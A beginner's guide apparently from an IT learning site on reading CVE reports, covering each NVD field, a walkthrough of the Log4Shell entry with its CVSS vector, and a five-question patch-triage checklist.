CVE 📅 Jul 3, 2026 ⏱ 8 min read 👶 Beginner friendly

How to Read a CVE Report: A Beginner's Guide

A security engineer sends you a Slack message: "CVE-2024-XXXXX just dropped, score 9.8 — are we affected?" Do you know how to find out? Reading a CVE report is a core IT skill. This guide walks you through every field, using the most famous CVE in recent history as a live example.

Where to find CVE reports

There are three primary sources:

Anatomy of a CVE report

Every NVD CVE page has the same structure. Here is what each section means:

CVE ID
The unique identifier. Format: CVE-YEAR-NUMBER. The year is when the ID was assigned, not when the vulnerability was discovered.
Description
A plain-English explanation of the vulnerability — what software is affected, what an attacker can do, and under what conditions. Read this carefully. Look for keywords: "remote code execution", "privilege escalation", "authentication bypass", "denial of service". These tell you what the attacker gains.
CVSS Score & Vector
The severity score (0–10) and the vector string that shows how it was calculated. Example: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Each component (AV=Attack Vector, AC=Complexity, PR=Privileges Required, etc.) tells you something specific about exploitability and impact.
CWE (Common Weakness Enumeration)
The category of weakness that caused the vulnerability. CWE-79 = XSS, CWE-89 = SQL Injection, CWE-502 = Deserialization of Untrusted Data (the Log4Shell category). Knowing the CWE helps you understand whether similar code patterns in your own software might have the same flaw.
Affected Configurations (CPE)
A list of specific software versions affected, in Common Platform Enumeration format. Example: cpe:2.3:a:apache:log4j:2.0:*:*:*:*:*:*:*. This is how vulnerability scanners know which software to flag. Check the version range carefully — sometimes only specific versions within a range are vulnerable.
References
Links to vendor advisories, security researcher blog posts, proof-of-concept exploit code, and patch releases. Always follow the vendor advisory link for the definitive patch instructions. Check whether the references include "Exploit" — this confirms working exploit code is publicly available.
Known Exploited (CISA KEV)
A banner appears if this CVE is in the CISA Known Exploited Vulnerabilities catalog. This means it is being actively exploited in the wild right now. If you see this, patching becomes a drop-everything priority.

Full walkthrough: Log4Shell (CVE-2021-44228)

CVE ID

CVE-2021-44228 — assigned in 2021, disclosed publicly on 9 December 2021.

Description (simplified)

"Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled."

Translation: If your Java application uses Log4j to write log messages, and an attacker can get any text they control into a log message (a username field, a HTTP header, anything), they can make your server download and run their malicious code from the internet. No authentication needed.

CVSS Score

CRITICAL 10.0 — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Reading the vector: Network attack (AV:N), Low complexity (AC:L), No privileges required (PR:N), No user interaction (UI:N), Changed scope (S:C — the attack affects systems beyond the vulnerable component), High confidentiality impact (C:H), High integrity impact (I:H), High availability impact (A:H). Maximum score across every dimension.

CWE

CWE-917 — Improper Neutralisation of Special Elements used in an Expression Language Statement. The logging library interpreted user-controlled input as code (a JNDI lookup expression) instead of treating it as plain text.

Affected configurations

Apache Log4j2 versions 2.0-beta9 through 2.14.1. Note: Log4j 1.x is NOT affected by this CVE (it has different vulnerabilities). The fix was released in 2.15.0 (partial) and fully resolved in 2.16.0 and 2.17.0.

Key references

Lesson from Log4Shell

The hardest part of Log4Shell was not patching Log4j itself — it was finding all the places Log4j was used. Many organisations had no idea they had it because it was bundled inside other commercial products. This is why software bill of materials (SBOM) — a list of every library in your software — is now a compliance requirement for many industries.

Vendor advisories — why they matter

The NVD entry gives you the vulnerability; vendor advisories give you the fix. After finding a CVE that affects your software, always look up the vendor's specific advisory for:

The 5 questions to ask every time

When you read a CVE report, these five questions give you everything you need to make a decision:

  1. Do we run the affected software? Check your asset inventory against the CPE list. If no, you are done.
  2. Are we on a vulnerable version? Version ranges matter. 2.14.0 affected, 2.17.0 not. Check precisely.
  3. Is it reachable? Is the vulnerable service exposed to the internet, to internal users, or only to admins? Network exposure dramatically changes risk.
  4. Is there a patch? If yes, apply it. Check the vendor advisory for the specific patched version.
  5. Is it being actively exploited? Check the CISA KEV catalog. If yes, patch immediately — before anything else.

Tools that make CVE reading easier

Frequently asked questions

What does "RESERVED" mean on a CVE page?

RESERVED means the CVE ID has been allocated but the details have not been published yet. This happens during the embargo period — when the vendor is working on a patch but has not disclosed the vulnerability publicly. The full details will appear once the patch is released.

Why do some CVEs have no CVSS score?

The NVD team scores CVEs after publication. Newly published CVEs sometimes show "NVD analysis not yet performed." The score usually appears within a few days. You can also check the vendor's own advisory, which often includes its own CVSS score.

Should I patch every CVE I find?

No — prioritise. Focus on Critical and High scores, especially those in the CISA KEV catalog. Medium and Low scores can go into your normal patch cycle. For systems that are isolated from the internet and from sensitive data, even high scores can sometimes wait for scheduled maintenance windows.

Keep learning on ITVedas

You now know how to find, read, and act on a CVE report. Explore the full CVE chapter for more guides on vulnerability management.

Back to CVE Chapter →